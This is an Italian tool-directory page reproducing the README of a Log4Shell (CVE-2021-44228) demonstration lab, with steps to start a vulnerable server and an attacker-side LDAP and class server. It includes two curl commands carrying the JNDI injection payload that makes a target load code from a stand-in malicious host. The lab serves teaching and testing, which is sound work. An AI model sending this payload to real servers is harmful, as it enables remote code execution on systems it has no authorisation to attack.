Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Log4Shell-demo — Demo per mostrare come funziona la vulnerabilità Log4Shell / CVE-2021-44228 | Kitploit
Strumenti/GitHubGitHub/mschmnet/log4shell-demo
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubmschmnet/log4shell-demo

Log4Shell-demo

Demo per mostrare come funziona la vulnerabilità Log4Shell / CVE-2021-44228

Vedi Repository
714 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Log4Shell in azione

Questo progetto mira a dimostrare come funziona la vulnerabilità Log4Shell / CVE-2021-44228.

Requisiti

È sufficiente avere Docker installato. Idealmente si dispone di due macchine virtuali diverse. Una per il server vulnerabile e una per il server malintenzionato che ospiterà il codebase dannoso e un server LDAP.

Opzionalmente puoi avere Make e Docker Compose installati, ma non è necessario poiché questo repository contiene anche make.sh per saltare questi requisiti e usarli da un container Docker.

Installare Docker (opzionalmente)

Se non l'hai già fatto, ecco i passaggi per installare Docker su una VM Debian. Puoi usare questi passaggi: https://gist.github.com/mschmnet/5d8c979920801c73e148c901a5989b46

Scaricare il repository

root@kitploit:~
git clone [email protected]:mschmnet/Log4Shell-demo.git 

Installare il server vulnerabile

root@kitploit:~
cd vulnerable-server
../make.sh run # Or you coud execute make run if you hade Make and Docker Compose installed

Avviare il server malintenzionato

Questo avvierà un server LDAP di base e un server Python di base per servire le classi Java dannose.

Devi fornire l'indirizzo IP o il nome di dominio in cui questi server saranno disponibili

root@kitploit:~
cd malicious-server
../make.sh run CODEBASE_URL=SERVER_IP_OR_DOMAIN_NAME # Optionally make instead of ../make.sh if you had Make and Docker Compose installed

Come attaccare il server di destinazione

root@kitploit:~
curl -X GET -G --data-urlencode 'foo=${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}' http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint

oppure semplicemente

root@kitploit:~
curl --location --request GET 'http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D'

dove ${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a} è semplicemente codificato nell'URL

Come fermarli

root@kitploit:~
../make.sh stop

Come mostrare i log

root@kitploit:~
../make.sh logs 

Diapositive

https://raw.githubusercontent.com/mschmnet/Log4Shell-demo/main/pdf/slides.pdf

Scarica lo strumento